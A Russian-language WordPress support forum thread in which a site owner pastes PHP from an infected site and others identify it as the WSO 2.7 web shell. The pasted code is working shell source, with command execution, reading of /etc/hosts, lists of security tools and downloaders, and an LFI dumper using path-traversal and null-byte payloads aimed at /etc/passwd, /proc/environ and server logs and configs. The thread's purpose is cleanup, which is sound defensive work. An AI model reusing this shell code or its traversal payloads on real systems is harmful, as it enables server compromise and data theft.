                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
    			echo '<br>';
    			$temp=array();
    			foreach ($userful as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Userful', implode(', ',$temp));
    			$temp=array();
    			foreach ($danger as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Danger', implode(', ',$temp));
    			$temp=array();
    			foreach ($downloaders as $item)
    				if(wsoWhich($item))
                        $temp[] = $item;
    			wsoSecParam('Downloaders', implode(', ',$temp));
    			echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
    			wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
    		}
    	} else {
    		wsoSecParam('OS Version',wsoEx('ver'));
    		wsoSecParam('Account Settings',wsoEx('net accounts'));
    		wsoSecParam('User Accounts',wsoEx('net user'));
    	}
    	echo '</div>';
    	wsoFooter();
    }
    function actionlfiscan() {
        wsoHeader();
        print '
       <h3>Led-Zeppelin\'s LFI File dumper</h3>
    
       <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
          LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
             <option value="1">
                Access Log
             </option>
    
             <option value="2">
                httpd.conf
             </option>
    
             <option value="3">
                Error Log
             </option>
             <option value="4">
                php.ini
             </option>
             <option value="5">
                MySQL
             </option>
             <option value="6">
                FTP
             </option>
             <option value="7">
                Environ
             </option>
          </select> Null: <select name="null">
             <option value="%00">
                Yes
             </option>
    
             <option value="">
                No
             </option>
          </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
       </form>';
       error_reporting(0);
          if($_POST['lfiurl']) {
             print "<pre>";
             $cheader = $_POST['custom_header'];
             $target = $_POST['lfiurl'];
             $type = $_POST['scantype'];
             $byte1 = $_POST['null'];
             $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
             $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
             $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
             $lfiaccess = array(
                1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
                2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
                3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
                4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
                5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
                6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
                7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
                8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
                9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
                10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
                11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
                12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
                13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
                14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
                15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
                16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
                17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
                18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
                19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
                20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
                21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
                22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
                23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
    
             $lfierror = array(
                1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
                2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
                3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
                4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
                5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
                6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
                7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
                8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
                9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
                10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
                11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
                12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
                13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
                14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
                15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
                16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
                17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
                18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
                19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
                20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
                21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
                22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
                23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
    
             $lficonfig = array(
                1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
                2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
                3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
                4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
                5 => "../../../../../../../../../../../../../../.

    Если кто сможет помочь, буду премного благодарен.

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • что его искать то, он сам представляется:

    /* WSO 2.7 (404 Error Web Shell by Madleets.com) */

    а вообще возьмите оригинал вашей темы и построчно сравните файлы.

    Спасибо, что ответили. К сожалению, не имею такой возможности, т.к. сайт перешел ко мне уже с вирусом и незараженных исходников нет 🙁

    ну и удаляйте все, что начинается с данной строчки и до конца файла.

    в исходном коде видно,а через файлы темы не могу найти..(

    бяда теперь

    Ищу через Total Commander. Инструменты-поиск файлов. Искать файлы с текстом. Не находит во всем бэкапе ни одного файла. С любой переменной этого кода.

    fixed
    Был отредактирован файл базы данных

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Тема «Не могу найти вирус на сайте» закрыта для новых ответов.